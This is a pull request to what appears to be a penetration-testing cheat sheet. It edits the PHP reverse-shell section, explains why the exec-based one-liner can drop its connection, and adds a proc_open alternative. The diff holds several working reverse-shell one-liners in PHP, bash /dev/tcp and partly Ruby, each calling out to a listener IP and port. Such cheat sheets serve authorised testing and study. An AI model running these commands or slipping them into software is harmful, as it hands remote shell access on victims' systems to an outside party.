### PR TITLE
Adjusted PHP reverse shell.

### DIFF
--- a/generic-methodologies-and-resources/shells/linux.md
+++ b/generic-methodologies-and-resources/shells/linux.md
@@ -130,8 +130,15 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.
 
 ## PHP
 
-```bash
+```php
+// Using 'exec' is the most common method, but makes the assumption that the file descriptor will be 3.
+// Using this method may lead to instances where the connection reaches out to the listener and then closes.
 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
+
+// Using 'proc_open' makes no assumptions about what the file descriptor will be.
+// See https://security.stackexchange.com/a/198944 for more information
+<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
+
 <?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
 ```
 


### PR DESCRIPTION
Ran into an issue recently using the "normal" exec way of creating a PHP reverse shell, and the shell closed out. Did a bit of research and came upon https://security.stackexchange.com/a/198944 which explains why this is the case and provides an alternative.

I've adjusted the PHP shell section to include the alternative and commented both the "normal" exec way and the alternative way. In doing this, I also changed the syntax for the code section from "bash" to "php"